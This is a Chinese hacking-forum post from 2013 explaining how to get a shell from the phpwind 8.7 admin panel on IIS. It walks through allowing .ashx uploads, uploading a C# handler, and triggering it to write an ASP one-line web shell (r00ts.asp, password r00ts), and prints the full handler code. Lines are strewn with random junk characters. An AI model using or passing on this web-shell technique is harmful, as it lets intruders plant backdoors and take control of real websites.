找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2743|回复: 0
打印 上一主题 下一主题

phpwind 8.7 后台拿shell

[复制链接]
跳转到指定楼层
楼主
发表于 2013-7-26 12:41:46 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
首先点开后台地图 然后附件设置 添加一个ashx后缀 2000大小
4 X, c6 P( {7 r" U; C/ T9 M
+ ~+ e6 j6 z& a- L. x群里面我以前扔的那个ashx.txt 下载回来改成fuck.ashx" C& B% @0 G! A2 p0 z% ]

8 d! b, L: z4 A0 _2 Z9 B: \: m发表文章那边有个附件上传 把ashx扔上去 前提是iis 阿帕奇我还真不知道咋整# F* j- y, v$ z1 V- E
) P1 S& S% ~/ ^  a
然后再打开后台地图 附件优化 滑到下面就看到刚上传的ashx
4 D  s2 _8 Y/ t7 M6 m! y/ W
! s6 X2 r0 @" ^% m1 g5 C' t0 n打开之后空白 会在目录底下生成r00ts.asp 密码r00ts
$ [, J. x7 H* M0 H2 N( `   Y5 ?- H$ j$ o6 c: ?& A
下面是代码:5 _7 Z8 T, l: m/ s6 Q+ b1 d

' k* y# J7 \! U8 T0 W: ?<%@ WebHandler Language="C#"Class="Handler" %>
! ]1 N$ E/ p; ]; C% ?5 J& u* Fusing System;0 p7 q, E! \, `% \1 T
using System.Web;
$ m+ w3 K) w" O% S, Xusing System.IO;
+ @( F  b  N9 U+ D9 kpublic class Handler : IHttpHandler {
7 R- F+ d' N- ?; `$ q' @  N' ipublic void ProcessRequest (HttpContext context) {$ m9 k/ M( z+ \1 e
context.Response.ContentType = "text/plain";
1 m* K4 b' g/ W7 o( rStreamWriter file1= File.CreateText(context.Server.MapPath("r00ts.asp"));
: |" f8 p! n: D3 ffile1.Write("<%eval request(\"r00ts\")%>");3 b( C# ^7 R3 O/ w! x9 \! _
file1.Flush();
! W) l4 w1 L6 sfile1.Close();
4 {% P1 m! w/ y  U2 _$ R}
4 s& B" O- T! C  Y- B5 opublic bool IsReusable {
8 }  S, Y% a& u# M3 T- }get {. d; M* z4 Y, [7 C) J4 }9 m: D
return false;! m" L1 r4 n4 ]
}7 P2 |' h; W, Q  ?5 z  T
}1 I6 o. L: t  ]3 ~+ I! m  u
}* R+ m/ j$ o" N
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表